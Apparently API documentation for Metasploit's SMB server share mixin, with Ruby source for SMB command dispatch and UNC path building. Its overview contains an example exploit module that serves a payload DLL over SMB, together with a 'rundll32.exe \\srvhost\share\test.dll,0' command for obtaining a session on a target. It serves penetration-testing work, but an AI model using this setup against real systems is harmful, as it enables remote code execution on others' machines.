Module: Msf::Exploit::Remote::SMB::Server::Share
- Includes:
- Msf::Exploit::Remote::SMB::Server, Command::Close, Command::Negotiate, Command::NtCreateAndx, Command::ReadAndx, Command::SessionSetupAndx, Command::Trans2, Command::Trans2::FindFirst2, Command::Trans2::QueryFileInformation, Command::Trans2::QueryPathInformation, InformationLevel::Find, InformationLevel::Query
- Defined in:
- lib/msf/core/exploit/remote/smb/server/share.rb,
lib/msf/core/exploit/remote/smb/server/share/command.rb,
lib/msf/core/exploit/remote/smb/server/share/command/close.rb,
lib/msf/core/exploit/remote/smb/server/share/command/trans2.rb,
lib/msf/core/exploit/remote/smb/server/share/command/negotiate.rb,
lib/msf/core/exploit/remote/smb/server/share/command/read_andx.rb,
lib/msf/core/exploit/remote/smb/server/share/information_level.rb,
lib/msf/core/exploit/remote/smb/server/share/command/nt_create_andx.rb,
lib/msf/core/exploit/remote/smb/server/share/information_level/find.rb,
lib/msf/core/exploit/remote/smb/server/share/information_level/query.rb,
lib/msf/core/exploit/remote/smb/server/share/command/session_setup_andx.rb,
lib/msf/core/exploit/remote/smb/server/share/command/trans2/find_first2.rb,
lib/msf/core/exploit/remote/smb/server/share/command/trans2/query_file_information.rb,
lib/msf/core/exploit/remote/smb/server/share/command/trans2/query_path_information.rb
Overview
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Exploit::Remote::SMB::Server::Share
def initialize(info={})
super(update_info(info,
'Name' => "Example Exploit",
'Description' => %q{
Example exploit, the Server shares a DLL embedding the payload. A session
can be achieved by executing 'rundll32.exe \\srvhost\share\test.dll,0' from
from the target.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matthew Hall',
'juan vazquez'
],
'References' =>
[
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074']
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
['Windows XP SP3 / Windows 2003 SP2', {}],
],
'Privileged' => false,
'DisclosureDate' => "Mar 02 2015",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILE_NAME', [ false, 'DLL File name to share', 'test.dll'])
], self.class)
deregister_options('FILE_CONTENTS')
end
def primer
self.file_contents = generate_payload_dll
print_status("File available on #{unc}...")
end
end
Defined Under Namespace
Modules: Command, InformationLevel
Constant Summary collapse
- FLAGS =
CONST::FLAGS_REQ_RES | CONST::FLAGS_CASE_SENSITIVE
- FLAGS2 =
CONST::FLAGS2_UNICODE_STRINGS | CONST::FLAGS2_EXTENDED_SECURITY | CONST::FLAGS2_32_BIT_ERROR_CODES | CONST::FLAGS2_LONG_PATH_COMPONENTS
- CAPABILITIES =
CONST::CAP_UNIX_EXTENSIONS | CONST::CAP_LARGE_WRITEX | CONST::CAP_LARGE_READX | CONST::CAP_PASSTHRU | CONST::CAP_DFS | CONST::CAP_NT_FIND | CONST::CAP_LOCK_AND_READ | CONST::CAP_LEVEL_II_OPLOCKS | CONST::CAP_STATUS32 | CONST::CAP_RPC_REMOTE_APIS | CONST::CAP_NT_SMBS | CONST::CAP_LARGE_FILES | CONST::CAP_UNICODE | CONST::CAP_RAW_MODE
- CREATE_MAX_ACCESS =
CONST::SMB_READ_ACCESS | CONST::SMB_WRITE_ACCESS | CONST::SMB_APPEND_ACCESS | CONST::SMB_READ_EA_ACCESS | CONST::SMB_WRITE_EA_ACCESS | CONST::SMB_EXECUTE_ACCESS | CONST::SMB_DELETE_CHILD_ACCESS | CONST::SMB_READ_ATTRIBUTES_ACCESS | CONST::SMB_WRITE_ATTRIBUTES_ACCESS | CONST::SMB_DELETE_ACCESS | CONST::SMB_READ_CONTROL_ACCESS | CONST::SMB_WRITE_DAC_ACCESS | CONST::SMB_WRITE_OWNER_ACCESS | CONST::SMB_SYNC_ACCESS
- TREE_CONNECT_MAX_ACCESS =
CONST::SMB_READ_ACCESS | CONST::SMB_READ_EA_ACCESS | CONST::SMB_EXECUTE_ACCESS | CONST::SMB_READ_ATTRIBUTES_ACCESS | CONST::SMB_READ_CONTROL_ACCESS | CONST::SMB_SYNC_ACCESS
Constants included from Msf::Exploit::Remote::SMB::Server
CONST, CRYPT, EVADE, UTILS, XCEPT
Instance Attribute Summary collapse
-
#file_contents ⇒ String
The contents of the provided file.
-
#file_name ⇒ String
The file name of the provided UNC.
-
#folder_name ⇒ String
The folder where the provided file lives.
-
#hi ⇒ Integer
The high 4 bytes for the file 'created time'.
-
#lo ⇒ Integer
The low 4 bytes for the file 'created time'.
-
#share ⇒ String
The share portion of the provided UNC.
Attributes included from Msf::Exploit::Remote::SocketServer
Instance Method Summary collapse
-
#get_file_contents(client:, file: '', folder: '') ⇒ String
Returns the file contents for the requested file.
- #initialize(info = {}) ⇒ Object
-
#setup ⇒ Object
Setups the server configuration.
-
#smb_cmd_dispatch(cmd, c, buff) ⇒ Integer
Main dispatcher function.
-
#smb_conn(c) ⇒ Hash
New connection handler, executed when there is a new connection.
-
#srvhost ⇒ String
Builds the server address.
-
#unc ⇒ Object
Builds the UNC Name for the shared file.
Methods included from Msf::Exploit::Remote::SMB::Server
#on_client_close, #on_client_connect, #on_client_data, #smb_error, #smb_pool_update, #smb_recv, #smb_set_defaults, #smb_stop
Methods included from TcpServer
#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #ssl_version, #start_service
Methods included from Msf::Exploit::Remote::SocketServer
#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #exploit, #on_client_data, #primer, #regenerate_payload, #srvport, #start_service, #via_string
Methods included from InformationLevel::Query
#send_info_basic_res, #send_info_network_res, #send_info_standard_res, #smb_cmd_trans_query_file_info_basic, #smb_cmd_trans_query_file_info_standard, #smb_cmd_trans_query_path_info_basic, #smb_cmd_trans_query_path_info_network, #smb_cmd_trans_query_path_info_standard
Methods included from InformationLevel::Find
#send_find_file_both_directory_info_res, #send_find_file_names_info_res, #send_find_full_directory_info_res, #smb_cmd_find_file_both_directory_info, #smb_cmd_find_file_full_directory_info, #smb_cmd_find_file_names_info
Methods included from Command::Trans2::QueryPathInformation
#smb_cmd_trans2_query_path_information
Methods included from Command::Trans2::QueryFileInformation
#smb_cmd_trans2_query_file_information
Methods included from Command::Trans2::FindFirst2
Methods included from Command::Trans2
#normalize_path, #send_trans2_res, #smb_cmd_trans2, #smb_expand
Methods included from Command::SessionSetupAndx
#send_session_setup_andx_res, #smb_cmd_session_setup_andx
Methods included from Command::ReadAndx
#send_read_andx_res, #smb_cmd_read_andx
Methods included from Command::NtCreateAndx
#send_nt_create_andx_res, #smb_cmd_nt_create_andx
Methods included from Command::Negotiate
#send_negotitate_res, #smb_cmd_negotiate
Methods included from Command::Close
#send_close_res, #smb_cmd_close
Instance Attribute Details
#file_contents ⇒ String
Returns The contents of the provided file.
182 183 184 |
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 182 def file_contents @file_contents end |
#file_name ⇒ String
Returns The file name of the provided UNC.
173 174 175 |
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 173 def file_name @file_name end |
#folder_name ⇒ String
Returns The folder where the provided file lives.
170 171 172 |
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 170 def folder_name @folder_name end |
#hi ⇒ Integer
Returns The high 4 bytes for the file 'created time'.
176 177 178 |
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 176 def hi @hi end |
#lo ⇒ Integer
Returns The low 4 bytes for the file 'created time'.
179 180 181 |
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 179 def lo @lo end |
#share ⇒ String
Returns The share portion of the provided UNC.
167 168 169 |
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 167 def share @share end |
Instance Method Details
#get_file_contents(client:, file: '', folder: '') ⇒ String
This method will be useful when multiple files are supported. At the moment is used to be overriden by modules. So they can customize the file contents.
Returns the file contents for the requested file
234 235 236 |
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 234 def get_file_contents(client:, file: '', folder: '') file_contents end |
#initialize(info = {}) ⇒ Object
184 185 186 187 188 189 190 191 192 193 194 |
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 184 def initialize(info = {}) super ( [ OptString.new('SHARE', [ false, 'Share (Default Random)']), OptString.new('FILE_NAME', [ false, 'File name to share (Default Random)']), OptString.new('FOLDER_NAME', [ false, 'Folder name to share (Default none)']), OptPath.new('FILE_CONTENTS', [ false, 'File contents (Default Random)']) ], Msf::Exploit::Remote::SMB::Server::Share) end |
#setup ⇒ Object
Setups the server configuration.
197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 |
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 197 def setup super self.folder_name = datastore['FOLDER_NAME'] self.share = datastore['SHARE'] || Rex::Text.rand_text_alpha(4 + rand(3)) self.file_name = datastore['FILE_NAME'] || Rex::Text.rand_text_alpha(4 + rand(3)) t = Time.now.to_i self.hi, self.lo = ::Rex::Proto::SMB::Utils.time_unix_to_smb(t) # The module has an opportunity to set up the file contents in the "primer callback" if datastore['FILE_CONTENTS'] File.open(datastore['FILE_CONTENTS'], 'rb') { |f| self.file_contents = f.read } else self.file_contents = Rex::Text.rand_text_alpha(50 + rand(150)) end end |
#smb_cmd_dispatch(cmd, c, buff) ⇒ Integer
Main dispatcher function. Takes the client data and performs a case switch on the command (e.g. Negotiate, Session Setup, Read file, etc.)
268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 |
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 268 def smb_cmd_dispatch(cmd, c, buff) smb = @state[c] pkt = CONST::SMB_BASE_PKT.make_struct pkt.from_s(buff) #Record the IDs smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID'] smb[:user_id] = pkt['Payload']['SMB'].v['UserID'] smb[:tree_id] = pkt['Payload']['SMB'].v['TreeID'] smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID'] case cmd when CONST::SMB_COM_NEGOTIATE return smb_cmd_negotiate(c, buff) when CONST::SMB_COM_SESSION_SETUP_ANDX word_count = pkt['Payload']['SMB'].v['WordCount'] if word_count == 0x0d # Share Security Mode sessions return smb_cmd_session_setup_andx(c, buff) else print_status("SMB Share - #{smb[:ip]} Unknown SMB_COM_SESSION_SETUP_ANDX request type, ignoring... ") return smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS) end when CONST::SMB_COM_TRANSACTION2 return smb_cmd_trans2(c, buff) when CONST::SMB_COM_NT_CREATE_ANDX return smb_cmd_nt_create_andx(c, buff) when CONST::SMB_COM_READ_ANDX return smb_cmd_read_andx(c, buff) when CONST::SMB_COM_CLOSE return smb_cmd_close(c, buff) else vprint_status("SMB Share - #{smb[:ip]} Unknown SMB command #{cmd.to_s(16)}, ignoring... ") return smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS) end end |
#smb_conn(c) ⇒ Hash
New connection handler, executed when there is a new connection.
249 250 251 252 253 254 255 256 257 258 259 |
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 249 def smb_conn(c) @state[c] = { :name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :multiplex_id => rand(0xffff), :process_id => rand(0xffff), :file_id => 0xdead, :dir_id => 0xbeef } end |
#srvhost ⇒ String
Builds the server address.
241 242 243 |
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 241 def srvhost datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'] end |
#unc ⇒ Object
Builds the UNC Name for the shared file
216 217 218 219 220 221 222 223 224 |
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 216 def unc if folder_name path = "\\\\#{srvhost}\\#{share}\\#{folder_name}\\#{file_name}" else path = "\\\\#{srvhost}\\#{share}\\#{file_name}" end path end |